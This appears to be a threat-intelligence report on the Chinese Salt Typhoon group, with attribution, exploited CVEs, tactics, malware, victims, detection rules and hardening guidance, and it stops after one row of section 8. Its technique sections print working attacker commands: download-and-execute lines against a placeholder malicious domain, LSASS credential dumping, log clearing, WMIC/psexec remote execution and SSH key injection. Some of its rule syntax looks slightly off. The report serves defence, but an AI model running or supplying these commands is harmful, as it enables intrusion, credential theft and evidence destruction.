SALT TYPHOON: COMPREHENSIVE RESEARCH & ANALYSIS REPORT
📋 EXECUTIVE SUMMARY
Salt Typhoon is a sophisticated advanced persistent threat (APT) group operated by the People’s Republic of China’s Ministry of State Security (MSS). Since at least 2019, the group has conducted one of the most consequential cyber espionage campaigns in modern history, compromising telecommunications infrastructure, government networks, and critical systems across 80+ countries and 200+ organizations
Key Findings
| Category | Assessment |
|---|---|
| Attribution | High confidence: China’s Ministry of State Security (MSS), with contractor support from Sichuan Juxinhe Network Technology Co. Ltd. and affiliated entities www.cisa.gov |
| Primary Mission | Long-term intelligence collection with pre-positioning for potential service disruption during geopolitical crisis |
| Target Scope | Telecommunications backbone infrastructure, government wiretap systems (CALEA), defense contractors, transportation, lodging, and critical infrastructure globally |
| Technical Sophistication | Advanced: Custom malware (Demodex rootkit, SnappyBee), living-off-the-land techniques, kernel-level persistence, multi-hop C2 infrastructure |
| Current Status | ACTIVE: FBI confirmed February 2026 that threats remain “still very much ongoing” |
| Strategic Impact | Compromise of communications infrastructure enables surveillance of political/military leaders, potential disruption capability during Taiwan contingency or other crisis |
Urgent Recommendations
- Patch Immediately: Prioritize CVE-2023-20198/20273 (Cisco IOS XE), CVE-2024-21887 (Ivanti), CVE-2024-3400 (Palo Alto)
- Audit Network Devices: Review ACLs, SSH configurations, Guest Shell containers, and SNMP settings for unauthorized modifications
- Deploy Behavioral Detection: Signature-based tools miss Salt Typhoon’s living-off-the-land tactics; implement network/identity behavioral analytics
- Isolate Management Planes: Separate network device management traffic from data plane using VRFs and dedicated out-of-band networks
- Report Suspicious Activity: Coordinate with national CERTs, CISA (report@cisa.gov), or law enforcement per local regulations
1. BACKGROUND & DISCOVERY TIMELINE
1.1 Initial Disclosure (September 2024)
Salt Typhoon entered public awareness when the Wall Street Journal reported that Chinese state-sponsored hackers had compromised major U.S. telecommunications providers, including AT&T, Verizon, T-Mobile, Lumen, and Charter Communications
techcrunch.com. The breach was notable for:
- Targeting network edge routers rather than customer databases
- Accessing **lawful intercept **(CALEA) used by law enforcement for wiretaps
- Potentially exposing call metadata for over one million users
1.2 Multinational Response (2024-2026)
| Date | Event | Source |
|---|---|---|
| Sep 2024 | Initial public disclosure of U.S. telecom compromises | Wall Street Journal |
| Oct 2024 | CISA, NSA, FBI confirm breach scope; issue emergency guidance | CISA Alert |
| Dec 2024 | Five Eyes + 13-nation coalition releases joint advisory on telecom hardening | International Advisory |
| Jan 2025 | U.S. Treasury sanctions Sichuan Juxinhe Network Technology; FBI announces $10M bounty | OFAC/DOJ |
| Jun 2025 | Viasat confirmed as victim; new malware variants (TernDoor, PeerTime) identified | Industry Research |
| Aug 2025 | FBI confirms 200+ organizations across 80+ countries affected; joint advisory AA25-239A published | CISA AA25-239A |
| Nov 2025 | Australia’s ASIO confirms Salt Typhoon probed Australian telecom infrastructure | ASIO Statement |
| Dec 2025 | Intrusions detected in U.S. House of Representatives committee email systems | Congressional Disclosure |
| Feb 2026 | Norway and Singapore confirm national telecom breaches; FBI states threat “still very much ongoing” | FBI Cybertalks 2026 |
| May 2026 | Global Cyber Alliance publishes AIDE honeypot analysis confirming 72M+ China-origin attack attempts | GCA Research |
1.3 Why This Campaign Matters
Salt Typhoon represents a paradigm shift in state-sponsored cyber operations:
- Infrastructure Control vs. Data Theft: Unlike typical espionage campaigns focused on stealing intellectual property, Salt Typhoon seeks to control the communications infrastructure itself
- Strategic Pre-Positioning: Compromised routers enable both continuous intelligence collection AND potential disruption of communications during crisis
- Global Scale: Targeting spans North America, Europe, Asia-Pacific, and beyond—demonstrating unprecedented resource allocation
- Long Dwell Times: Confirmed persistence of 3+ years in some networks indicates exceptional operational patience and stealth
2. ATTRIBUTION & ORGANIZATIONAL STRUCTURE
2.1 State Sponsorship Assessment
| Entity | Role | Evidence | Confidence |
|---|---|---|---|
| **Ministry of State Security **(MSS) | Strategic oversight, tasking, resource allocation | Treasury sanctions, infrastructure overlap, victimology alignment with PRC intelligence priorities | 🔴 High |
| MSS Chengdu Bureau | Regional operational coordination for Asia-Pacific campaigns | Contractor location patterns, linguistic artifacts in tooling, procurement document analysis | 🟠 Medium-High |
| **People’s Liberation Army **(PLA) | Secondary coordination for military-targeted intrusions; occasional tooling overlap | Shared infrastructure with PLA-linked groups; similar TTPs in defense-sector targeting | 🟡 Medium |
2.2 Contractor Ecosystem (Plausible Deniability Layer)
Salt Typhoon operates through a hybrid state-corporate model using pseudo-private companies to obscure direct MSS involvement
| Company (Chinese/English) | Function | Sanction Status | Key Evidence |
|---|---|---|---|
| Sichuan Juxinhe Network Technology Co. Ltd. (四川聚信和网络科技有限公司) | Primary infrastructure contractor: domain registration, C2 hosting, malware staging | ✅ OFAC Sanctioned (Jan 2025) www.safebreach.com | Direct involvement in telecom exploitation; “strong ties” to MSS per Treasury designation |
| Beijing Huanyu Tianqiong Information Technology (北京寰宇天穹信息技术有限公司) | Tool development, data brokerage, technical support | ⚠️ Named in multinational advisory (Aug 2025) www.cisa.gov | Leadership overlap with Sichuan firms; patent filings linking to MSS research |
| Sichuan Zhixin Ruijie Network Technology (四川智信锐捷网络科技有限公司) | Technical support, PLA contract fulfillment, logistics | ⚠️ Named in multinational advisory (Aug 2025) www.cisa.gov | Received ¥748,600 PLA contract for “Mobile Technology Research Simulation Environment” (Oct 2023) |
| i-SOON / Anxun Information Technology (安洵科技) | Infrastructure leasing, offensive tooling support, deniability layer | ⚠️ UK-sanctioned (Jan 2026); U.S. under review | Leaked internal docs confirm MSS tasking; provides “cut-out” for operational deniability |
2.3 Named Individuals (Publicly Identified)
Only two individuals have been formally named by U.S. authorities in connection with Salt Typhoon:
🔴 Yin Kecheng (尹克成)
| Attribute | Details |
|---|---|
| Status | ✅ Indicted (DOJ), ✅ Sanctioned (OFAC), ✅ FBI Most Wanted |
| Reward | $2 million via Rewards for Justice program |
| Role | Infrastructure operator: managed C2 routing, domain registration, malware deployment |
| Affiliation | Sichuan Juxinhe Network Technology; MSS-affiliated |
| Technical Focus | Telecom infrastructure exploitation; SIP/VoIP interception; router hijacking |
| Location | Shanghai-based (per Treasury designation) |
| Public Evidence | Linked to U.S. Treasury network compromise; domain registration patterns using fabricated U.S. personas |
🔴 Zhou Shuai (Alias: “Coldface” / 周帅)
| Attribute | Details |
|---|---|
| Status | ✅ Indicted (DOJ), ✅ Sanctioned (OFAC), ✅ FBI Most Wanted |
| Reward | $2 million via Rewards for Justice program |
| Role | Strategic broker: coordinated data resale, contractor logistics, MSS tasking interface |
| Affiliation | Former: Shanghai Heiying Information Technology; i-SOON Strategic Consulting Division |
| Technical Focus | Infrastructure brokerage; front-company coordination; operational planning |
| Public Evidence | DOJ indictment details role in selling compromised access; linked to i-SOON contractor ecosystem |
⚠️ Critical Note: The scarcity of publicly named individuals reflects Salt Typhoon’s operational security discipline. Most operators likely use aliases, rotate infrastructure, and operate behind layers of contractor deniability.
2.4 Organizational Chart (Inferred)
MINISTRY OF STATE SECURITY (MSS)
│
├─ Strategic Tasking & Oversight
│ └─ Chengdu Bureau (reported regional hub for APAC operations)
│
├─ Contractor Ecosystem (Funding & Operational Conduit)
│ ├─ Sichuan Juxinhe Network Technology [SANCTIONED]
│ │ └─ Yin Kecheng (Named Infrastructure Operator)
│ │
│ ├─ Beijing Huanyu Tianqiong Information Technology
│ │ └─ Yu Yang / Shang Xuejing (Leadership overlap; patent co-inventors)
│ │
│ ├─ Sichuan Zhixin Ruijie Network Technology
│ │ └─ PLA contract fulfillment; provincial grant recipient
│ │
│ └─ i-SOON / Anxun Information Technology [UK-SANCTIONED]
│ └─ Infrastructure leasing; deniability layer for MSS operations
│
├─ Operational Teams (Compartmentalized by Region/Function)
│ ├─ Americas Team: U.S./Canada telecom targeting
│ ├─ APAC Team: Southeast Asia, India, Australia operations
│ ├─ EMEA Team: European telecom and government targeting
│ └─ Tooling Team: Malware development, infrastructure automation
│
└─ Support Functions
├─ Domain Registration: ProtonMail accounts + fabricated U.S. personas
├─ VPS Procurement: LightNode, offshore providers for C2 infrastructure
└─ Financial Laundering: Contractor invoicing, provincial grant mechanisms
3. TECHNICAL ANALYSIS: TACTICS, TECHNIQUES & PROCEDURES
3.1 Attack Lifecycle Overview
Salt Typhoon follows a structured, patient attack sequence emphasizing persistence over speed:
Initial Access → Execution → Persistence → Privilege Escalation →
Defense Evasion → Credential Access → Discovery → Lateral Movement →
Collection → Command & Control → Exfiltration → Long-Term Espionage
3.2 Initial Access: Exploiting Known Vulnerabilities
Salt Typhoon prioritizes publicly known, unpatched vulnerabilities in internet-facing network infrastructure. No zero-day exploits have been publicly confirmed; the group exploits patching delays and misconfigurations
Confirmed Exploited CVEs (Prioritized by Risk)
| CVE | Vendor/Product | Vulnerability | Exploitation Method | MITRE ATT&CK |
|---|---|---|---|---|
| CVE-2023-20198 | Cisco IOS XE | Web UI authentication bypass | WSMA endpoint abuse; double-encoded paths (/%2577eb%2575i_%2577sma_Http) | T1190 |
| CVE-2023-20273 | Cisco IOS XE | Post-auth command injection | Chained with CVE-2023-20198 for root access | T1068 |
| CVE-2024-21887 | Ivanti Connect Secure | Command injection | Web component exploitation; chained after CVE-2023-46805 | T1190 |
| CVE-2024-3400 | Palo Alto PAN-OS | Arbitrary file creation → RCE | GlobalProtect module abuse | T1190 |
| CVE-2023-46805 | Ivanti Connect Secure | Authentication bypass | Logic flaw in auth flow | T1190 |
| CVE-2021-26855 | Microsoft Exchange | SSRF (ProxyLogon) | Server-side request forgery | T1190 |
| CVE-2022-3236 | Sophos Firewall | Code injection | Web interface exploitation | T1190 |
| CVE-2025-5777 | Citrix NetScaler | Unauthenticated memory read | Gateway exploitation | T1190 |
Infrastructure Targeting Patterns
- Primary: Cisco IOS XE edge routers (provider edge/customer edge)
- Secondary: Ivanti/Palo Alto/Sophos VPN appliances, Microsoft Exchange servers
- Tertiary: Juniper, Nokia, Sierra Wireless devices (suspected but not publicly confirmed)
- Geographic Focus: Internet-exposed devices regardless of owner; leverages trusted interconnections to pivot into target networks www.cisa.gov
3.3 Persistence: Maintaining Long-Term Access
Salt Typhoon employs sophisticated persistence mechanisms designed to survive reboots, configuration resets, and security audits:
| Technique | Implementation | MITRE ATT&CK | Detection Challenge |
|---|---|---|---|
| ACL Modification | Adding threat actor IPs to permitted access lists (often named “access-list 20”, “50”, or “10”) | T1562.004 | Blends with legitimate network management changes |
| Non-Standard Port Exposure | Opening SSH/RDP/FTP on ports 22x22 (e.g., 22022, 22122) or 18xxx (e.g., 18080, 18443) | T1571 | Evades port-scanning tools focused on standard ports |
| SSH Key Injection | Adding attacker-controlled keys to ~/.ssh/authorized_keys on network devices | T1098.004 | Keys persist across password resets |
| Protocol Tunneling | Creating GRE/mGRE/IPsec tunnels for C2 traffic that blends with legitimate network management | T1572 | Encapsulated traffic appears as normal routing protocol |
| Guest Shell Container Abuse | Running malicious code inside Cisco’s Linux container (Guest Shell) to evade host-level monitoring | T1610 | Container activity not logged by default; processes egress via management VRF |
| Service Creation with InstallUtil Abuse | sc create VGAuthtools binpath="installutil.exe malware.exe" to bypass application whitelisting | T1543.003 | Uses signed Microsoft binary; evades naive EDR rules |
| Registry Run Keys | reg add HKCU\...\Run /v UpdateSvc /d "C:\Temp\svc.exe" for Windows persistence | T1547.001 | Common technique; requires behavioral context for detection |
Guest Shell Container Deep Dive
Cisco’s Guest Shell is a Linux container (LXC) managed by IOx that provides a powerful evasion mechanism:
Enable Guest Shell (if not already enabled)
guestshell enable
Enter container
guestshell run bash
Inside Guest Shell: Install tools, stage data, execute payloads
pip install requests cryptography # Install Python packages
python siet.py # Exploit Cisco Smart Install vulnerability
cp /bootflash/config.txt /tmp/staged_config # Stage stolen data
Why This Evades Detection:
- Commands executed inside Guest Shell are not logged by the host IOS CLI
- Network traffic from Guest Shell egresses via management VRF, appearing as legitimate management traffic
- Files stored in Guest Shell storage are not visible to host-level file integrity monitoring
- Container can be destroyed with
guestshell destroyto remove evidence
3.4 Defense Evasion: Blending Into Normal Operations
Salt Typhoon’s hallmark is minimizing forensic artifacts through **living-off-the-land **(LOTL) techniques:
Living-off-the-Land Command Examples
PowerShell execution bypass (avoids script block logging)
powershell -ex bypass -c “”
Registry persistence (common administrative task)
reg add “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v “UpdateSvc” /t REG_SZ /d “C:\Temp\svc.exe” /f
Remote execution via WMIC (legitimate admin tool)
wmic /node:”192.168.1.50″ process call create “cmd /c C:\Windows\Temp\payload.bat”
Credential dumping via comsvcs.dll (signed Microsoft binary)
rundll32 C:\Windows\System32\comsvcs.dll, MiniDump C:\Temp\lsass.dmp full
Log clearing (administrative maintenance task)
wevtutil cl Security & wevtutil cl System & wevtutil cl Application
Additional Evasion Techniques
| Technique | Implementation | Purpose |
|---|---|---|
| DLL Sideloading | Abuse legitimate AV software (Norton, Bkav, IObit) to load malicious DLLs | Evades application whitelisting; uses signed binaries |
| PowerShell Downgrade Attacks | Force PowerShell v2 execution to bypass modern script block logging | Avoids AMSI and advanced logging features |
| Double-Encoding Obfuscation | Encode WSMA requests as /%2577eb%2575i_%2577sma_Http to bypass simple signature detection | Evades regex-based WAF/IDS rules |
| **Kernel-Mode Rootkit **(Demodex) | Hide processes, files, network connections at kernel level | Prevents EDR and forensic tools from seeing malicious activity |
| Log Manipulation | Clear Windows Event Logs, disable audit policies, overwrite router syslog buffers | Removes evidence of intrusion activities |
3.5 Credential Access & Lateral Movement
Salt Typhoon targets authentication infrastructure to enable network-wide compromise:
Credential Harvesting Methods
| Method | Tool/Technique | Target Data |
|---|---|---|
| PCAP Collection on Routers | Cisco Embedded Packet Capture (EPC) targeting TCP port 49 (TACACS+) | Authentication credentials in cleartext or weakly encrypted form |
| Configuration File Theft | Copy router configs containing Cisco Type 5 (MD5) or Type 7 (reversible) password hashes | Local device credentials for brute-forcing |
| Mimikatz/SnappyBee Deployment | Memory scraping tools to extract plaintext passwords, NTLM hashes, Kerberos tickets | Domain credentials for lateral movement |
| Kerberos Attacks | Golden/Silver ticket forgery, Kerberoasting, AS-REP roasting | Domain admin privileges; persistence via forged tickets |
| TACACS+ Server Hijacking | Modify router AAA config to point authentication requests to attacker-controlled server | Capture admin credentials in real-time |
Lateral Movement Patterns
bash
Copy payload to target host via SMB
copy \192.168.1.50\C$\Windows\Temp\payload.bat
Execute remotely via WMIC
wmic /node:192.168.1.50 process call create “cmd /c C:\Windows\Temp\payload.bat”
Create persistent service with installutil bypass
sc \192.168.1.50 create VGAuthtools type= own start= auto binpath= “C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Temp\malware.exe”
Add SSH key for passwordless access
echo “ssh-rsa AAAAB3… attacker@salt-typhoon” >> ~/.ssh/authorized_keys
3.6 Collection Targets: What Salt Typhoon Steals
Unlike ransomware groups focused on bulk data exfiltration, Salt Typhoon targets high-value intelligence:
| Data Type | Strategic Value | Example Sources |
|---|---|---|
| **Call Detail Records **(CDRs) | Track communications patterns of government/military targets | Telecom billing systems, CALEA wiretap logs |
| Subscriber Metadata | Identify relationships, locations, affiliations of persons of interest | HLR/HSS databases, provisioning systems |
| Network Topology Maps | Understand infrastructure for future disruption operations | Router configs, BGP tables, network diagrams |
| Authentication Credentials | Enable lateral movement into government/defense networks | TACACS+/RADIUS logs, domain controller exports |
| Lawful Intercept Configurations | Access to wiretap systems used by law enforcement | CALEA server configs, mediation device logs |
| Incident Response Playbooks | Understand defender capabilities and blind spots | Security team documentation, SIEM rules |
3.7 Command & Control Infrastructure
Salt Typhoon uses a dual-channel C2 approach blending dedicated infrastructure with legitimate services:
C2 Channel Types
| Channel | Implementation | Evasion Technique |
|---|---|---|
| Dedicated C2 Servers | Cobalt Strike beacons, Demodex callbacks on compromised VPS | HTTPS encryption; domain fronting; rapid IP rotation |
| Legitimate Cloud Services | GitHub Gists, Gmail, Google Drive, AnonFiles, File.io | Traffic blends with normal user activity; hard to block |
| Protocol Tunneling | GRE/IPsec tunnels over compromised routers for C2 traffic | Encapsulated traffic appears as legitimate network management |
| Multi-Hop Proxies | STOWAWAY tool for chained relays through compromised infrastructure | Obscures true C2 destination; complicates attribution |
Infrastructure Characteristics
- Domain Registration: ProtonMail accounts exclusively; fabricated U.S. personas (e.g., “Monica Burch, Los Angeles”)
- Hosting Providers: Mix of offshore VPS (LightNode), compromised legitimate servers, and contractor infrastructure
- Geographic Distribution: C2 servers observed in Singapore, Netherlands, Russia, and China-proximate locations
- Rotation Frequency: Domains/IPs typically active for 1-3 months before abandonment
3.8 Exfiltration Methods
Data exfiltration is designed to avoid detection through low-volume, encrypted transfers:
| Method | Implementation | Detection Challenge |
|---|---|---|
| Peering Connection Abuse | Leverage direct ISP interconnects to bypass egress filtering | Traffic appears as legitimate peering exchange |
| Encrypted Archives | Custom Golang SFTP clients (cmd1, cmd3) transfer staged data to intermediary hosts | Encrypted payloads evade DLP; small chunks avoid bandwidth alerts |
| Steganography | Embed data in DNS queries, ICMP packets, or HTTP headers | Blends with normal protocol traffic; requires deep packet inspection |
| Low-and-Slow Exfiltration | Transfer small data chunks over extended periods (hours/days) | Avoids threshold-based anomaly detection |
4. MALWARE & TOOLING ARSENAL
4.1 Custom Malware Family
| Tool Name | Type | Function | Key Characteristics |
|---|---|---|---|
| Demodex | Windows kernel-mode rootkit | Persistent remote access; hides processes/files/network activity | Kernel-level hooking; anti-VM checks; survives reboots |
| SnappyBee | Backdoor/credential harvester | Keylogging, screenshot capture, credential extraction | DLL injection; process hollowing; encrypted C2 |
| GhostSpider | Modular backdoor | Plugin-based architecture for flexible post-compromise tasks | Encrypted C2; dynamic module loading; anti-analysis |
| HemiGate | Network reconnaissance tool | Port scanning, service enumeration, topology mapping | Legitimate-looking traffic patterns; slow scanning to avoid IDS |
| Crowdoor | Data exfiltration utility | Compresses, encrypts, and stages stolen data for transfer | Uses legitimate protocols (SFTP/HTTPS); chunked transfers |
| MASOL RAT | Remote Access Trojan | Full remote control; file system access; command execution | Anti-sandbox; delayed execution; custom encryption |
| TernDoor/PeerTime/BruteEntry | New variants (2025) | Expanded targeting of satellite/telecom infrastructure | Observed in South American campaigns; enhanced evasion |
4.2 Living-off-the-Land Binaries (LOLBins)
Salt Typhoon heavily leverages native OS tools to avoid dropping custom binaries:
PowerShell execution patterns
powershell -ex bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘hxxps://malicious[.]domain/loader’)”
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAeAB4AHAAOgAvAC8AbQBhAGwAaQBjAGkAbwB1AHMAWwAuAF0AZABvAG0AYQBpAG4ALwBsAG8AYQBkAGUAcgAnACkA
Registry manipulation for persistence
reg add “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v “SysUpdate” /t REG_SZ /d “C:\ProgramData\update.exe” /f
reg add “HKLM\SYSTEM\CurrentControlSet\Services\VGAuthtools” /v “ImagePath” /t REG_EXPAND_SZ /d “C:\Windows\System32\rundll32.exe C:\Temp\malware.dll,Start” /f
Remote execution via native tools
wmic /node:”10.0.0.50″ process call create “cmd /c C:\Windows\Temp\stage2.bat”
psexec \10.0.0.50 -accepteula -s cmd.exe /c “C:\Temp\payload.exe”
Credential dumping via signed binaries
rundll32 C:\Windows\System32\comsvcs.dll, MiniDump 1234 C:\Temp\lsass.dmp full
certutil -urlcache -split -f hxxps://malicious[.]domain/tool.exe C:\Temp\tool.exe
Log manipulation
wevtutil cl Security
wevtutil cl System
wevtutil cl Application
4.3 Infrastructure Automation Tools
| Tool | Purpose | Detection Signature |
|---|---|---|
| China Chopper | Lightweight web shell for initial server access | ASP/ASPX/PHP files with short obfuscated code; unusual POST parameters |
| STOWAWAY | Multi-hop pivoting tool for relaying C2 through compromised proxies | Unusual SOCKS/HTTP proxy traffic; encrypted node-to-node communication |
Custom SFTP Clients (cmd1, cmd3) | Golang binaries for encrypted file transfer | Go runtime strings; specific function names (main.SftpDownload, aes.decryptBlockGo) |
| Domain Registration Scripts | Automate ProtonMail account creation + domain registration with fabricated personas | Patterns in WHOIS data; ProtonMail + U.S. persona combinations |
5. GLOBAL TARGETING & VICTIMOLOGY
5.1 Geographic Scope (Confirmed & Suspected)
Salt Typhoon has targeted organizations across 80+ countries, with confirmed activity in:
| Region | Countries with Confirmed Activity | Primary Target Sectors |
|---|---|---|
| North America | United States, Canada | Telecom providers, government agencies, defense contractors |
| Europe | United Kingdom, Germany, France, Norway, Poland, Finland, Czech Republic | Telecom infrastructure, government networks, transportation |
| Asia-Pacific | Australia, Singapore, Japan, India, Thailand, Vietnam, Philippines, Taiwan | Telecom operators, government entities, critical infrastructure |
| Latin America | Brazil, Argentina, Chile | Telecom providers, satellite communications (Viasat incident) |
| Middle East/Africa | South Africa, UAE | Telecom infrastructure, government networks |
5.2 Sector Targeting Priorities
| Sector | Targeting Rationale | Example Victims |
|---|---|---|
| Telecommunications | Control of communications infrastructure enables surveillance and potential disruption | AT&T, Verizon, T-Mobile, Lumen, Charter, Viasat, BSNL (India), Singtel (Singapore) |
| Government | Access to policy communications, diplomatic cables, personnel data | U.S. Treasury, House of Representatives committees, foreign ministries |
| Defense & Aerospace | Intelligence on military capabilities, procurement, operations | Defense contractors, military logistics networks |
| Transportation | Understanding logistics networks for strategic planning | Airlines, shipping companies, rail infrastructure |
| Hospitality | Surveillance of traveling officials and business leaders | Luxury hotels frequented by government/military personnel |
| Critical Infrastructure | Pre-positioning for potential disruption during crisis | Energy grid operators, water treatment facilities (suspected) |
5.3 India-Specific Assessment
While no Indian government agency has publicly attributed an incident to Salt Typhoon, industry research and infrastructure analysis indicate elevated risk:
Evidence of India Targeting
| Source | Finding | Confidence |
|---|---|---|
| Vectra AI Threat Briefing | Lists India among Asia-Pacific countries impacted by Salt Typhoon since 2023 | 🟠 Medium (Industry assessment) |
| Global Cyber Alliance AIDE Research | Observed China-origin attack patterns consistent with Salt Typhoon TTPs targeting APAC telecom infrastructure | 🟠 Medium (Behavioral correlation) |
| Indian Telecom Breach Reports | Multiple incidents (BSNL data exposure, 750M user leak) with unattributed but sophisticated TTPs | ⚪ Low (No public attribution) |
High-Risk Indian Entities
| Entity Type | Risk Factors | Recommended Actions |
|---|---|---|
| State-Owned Telecoms (BSNL, MTNL) | Legacy infrastructure; slower patching cycles; high-value target for geopolitical intelligence | Prioritize Cisco IOS XE/Ivanti patching; audit Guest Shell configurations |
| Private Telecom Operators (Jio, Airtel, Vi) | Large subscriber bases; critical national infrastructure; potential CALEA access | Implement management-plane isolation; deploy behavioral NDR |
| Government Networks | Policy communications; personnel data; potential pivot point to defense networks | Enforce MFA for administrative access; segment management traffic |
| Critical Infrastructure Operators | Pre-positioning for disruption capability during crisis | Conduct Salt Typhoon-specific threat hunting; validate IR playbooks |
CERT-In & NCIIPC Coordination
- Reporting Requirement: CERT-In Directions 2022 mandate incident reporting within 6 hours of detection
- Log Retention: Preserve logs for minimum 180 days per IT Act compliance
- CII Designation: Organizations operating Critical Information Infrastructure must coordinate with NCIIPC for threat intelligence sharing
6. DETECTION & MITIGATION GUIDANCE
6.1 Immediate Actions (0-72 Hours)
| Priority | Action | Reference CVE/Technique | Verification Method |
|---|---|---|---|
| 🔴 Critical | Patch Cisco IOS XE CVE-2023-20198/20273 | www.cisa.gov | show version + CISA scanner |
| 🔴 Critical | Patch Ivanti CVE-2023-46805/2024-21887 | www.cisa.gov | Ivanti admin console + external scan |
| 🔴 Critical | Disable Cisco Guest Shell if unused | T1610 | show guest-shell status |
| 🔴 Critical | Audit ACLs for unauthorized IP additions | T1562.004 | show access-lists review |
| 🟠 High | Restrict management interfaces to trusted IPs | T1021.004 | Firewall rule audit |
| 🟠 High | Enable SNMPv3 with auth/privacy; disable v1/v2 | T1021 | show snmp user |
| 🟠 High | Rotate all TACACS+/RADIUS shared secrets | T1556 | AAA config review |
6.2 Network Detection Rules (Suricata/Snort)
Detect Cisco IOS XE WSMA exploitation (CVE-2023-20198)
alert http any any -> any any (
msg:”SALT_TYPHOON_CVE-2023-20198_WSMA_BYPASS”;
flow:to_server,established;
uri.pcre:”/%2577(?:eb|ui)_%2577sma_Http[s]?/i”;
http.method:”POST”;
classtype:web-application-attack;
sid:2025001;
rev:1;
)
Detect non-standard management port usage (SSH on xxx22)
alert tcp any any -> any any (
msg:”SALT_TYPHOON_NONSTANDARD_SSH_PORT”;
flow:to_server,established;
port:22022,22122,22222,22322,22422,22522,22622,22722,22822,22922;
content:”SSH-2.0-“;
classtype:policy-violation;
sid:2025003;
rev:1;
)
Detect GRE tunnel establishment (potential C2 channel)
alert ip any any -> any any (
msg:”SALT_TYPHOON_GRE_TUNNEL_DETECTED”;
ip.proto:47;
threshold:type threshold, track by_src, count 1, seconds 300;
classtype:policy-violation;
sid:2025004;
rev:1;
)
6.3 Endpoint Detection Rules (YARA)
// Rule: Detect Salt Typhoon Cmd1 SFTP Client (Go-based)
rule SALT_TYPHOON_CMD1_SFTP_CLIENT {
meta:
description = “Detects the Salt Typhoon Cmd1 SFTP client. Rule is meant for threat hunting.”
author = “CISA/NSA/FBI”
date = “2025-09-03”
sha256 = “f2bbba1ea0f34b262f158ff31e00d39d89bbc471d04e8fca60a034cabe18e4f4”
strings:
$s1 = "monitor capture CAP" ascii
$s2 = "export ftp://%s:%s@%s%s" ascii
$s3 = "main.CapExport" ascii
$s4 = "main.SftpDownload" ascii
$s5 = ".(*SSHClient).CommandShell" ascii
$aes = "aes.decryptBlockGo" ascii
$buildpath = "C:/work/sync_v1/cmd/cmd1/main.go" ascii
condition:
uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and 4 of them}
// Rule: Detect Demodex Rootkit Artifacts
rule SALT_TYPHOON_DEMODEX_ROOTKIT {
meta:
description = “Detects kernel-mode rootkit artifacts associated with Salt Typhoon”
author = “CISA/NSA/FBI”
threat_level = “critical”
strings:
$driver_name = "demodex.sys" ascii
$service_name = "VGAuthtools" ascii
$mutex = "Global\\DEMODEX_MUTEX_2024" ascii
$ioctl_code = "\x22\xA0\x03\x00" // DeviceIoControl pattern
condition:
any of them}
6.4 SIEM Hunting Queries (Splunk Example)
Hunt for double-encoded WSMA requests (Cisco exploitation)
index=cisco sourcetype=cisco:ios
| search uri=”%2577” AND (uri=”wsma_Http” OR uri=”wsma_Https“)
| stats count by src_ip, uri, http_method
| where count > 5
Detect unusual PowerShell execution patterns
index=windows EventCode=4104
| search ScriptBlockText=”* -ex bypass ” OR ScriptBlockText=” -enc *”
| stats count by User, Computer, ScriptBlockText
| where count > 3
Identify Guest Shell container activity
index=cisco sourcetype=cisco:ios
| search message=”guestshell” OR message=”pip install” OR message=”yum install“
| table _time, src_ip, message
6.5 Telecom Infrastructure Hardening (Cisco IOS XE Example)
! ========================================
! Salt Typhoon Mitigation: Cisco IOS XE
! Reference: CISA AA25-239A
! Apply AFTER patching CVE-2023-20198/20273
! ========================================
! === Disable Unused Services ===
no ip http server
no ip http secure-server ! Only if WebUI not required; re-enable post-patch with ACLs
no service tcp-small-servers
no service udp-small-servers
! === Harden Management Plane ===
ip ssh version 2
ip ssh server algorithm encryption aes256-ctr aes192-ctr aes128-ctr
ip ssh server algorithm mac hmac-sha2-256 hmac-sha2-512
line vty 0 15
transport input ssh
access-class MGMT_ONLY in
login authentication TACACS_LOCAL
exec-timeout 5 0
!
! === Control Plane Policing (CoPP) ===
class-map match-any COPP_MGMT
match access-group name COPP_MGMT_ACL
!
policy-map COPP_POLICY
class COPP_MGMT
police cir 1000000 bc 1500 be 1500 conform-action transmit exceed-action drop violate-action drop
!
control-plane
service-policy input COPP_POLICY
!
! === Disable Guest Shell (if not required) ===
no guest-shell enable
! === Logging & Monitoring ===
logging host transport tcp port 6514
logging trap informational
service timestamps log datetime msec show-timezone
! === ACL for Management Access ===
ip access-list extended MGMT_ONLY
permit tcp any eq 22
permit tcp any eq 443
deny ip any any log
7. POLICY & REGULATORY IMPLICATIONS
7.1 United States
| Regulation/Policy | Impact | Action Required |
|---|---|---|
| Executive Order 14028 (Improving Cybersecurity) | Mandates zero trust architecture, software supply chain security for federal agencies | Accelerate ZTA adoption; implement SBOM requirements |
| FCC Telecom Security Rules | Requires telecom providers to secure network infrastructure | Conduct Salt Typhoon-specific risk assessments; report breaches within 30 days |
| CISA Binding Operational Directive 22-01 | Requires federal agencies to reduce exposure to known exploited vulnerabilities | Patch CVEs within mandated timelines; deploy CISA-approved detection rules |
7.2 India
| Regulation/Policy | Impact | Action Required |
|---|---|---|
| CERT-In Directions, 2022 | Mandates 6-hour incident reporting; 180-day log retention | Implement automated alerting; validate log retention systems |
| **Digital Personal Data Protection **(DPDP) | Requires breach notification for personal data exposure | Assess if subscriber metadata exposure triggers notification obligations |
| NCIIPC Guidelines for CII | Additional security requirements for Critical Information Infrastructure | Coordinate with NCIIPC for threat intelligence sharing; implement baseline controls |
| IT Act Section 43/66 | Liability for negligence in securing computer resources | Document security controls; maintain audit trails for compliance |
7.3 International Coordination
| Framework | Role in Salt Typhoon Response |
|---|---|
| **Five Eyes **(FVEY) | Intelligence sharing on TTPs, IOCs, attribution assessments |
| APCERT | Regional threat intelligence sharing for Asia-Pacific telecom operators |
| FIRST | Global coordination on incident response best practices |
| ITU-T X.1205 | International standards for telecom security; guidance for member states |
8. FUTURE THREAT OUTLOOK (2026-2028)
8.1 Expected Evolution of Salt Typhoon TTPs
| Trend | Likely Development | Defensive Implication |
|---|---|---|
| AI-Enhanced Evasion | Use of generative AI to craft polymorphic payloads that evade signature detection | Shift to behavioral detection; invest in AI-powered threat hunting |
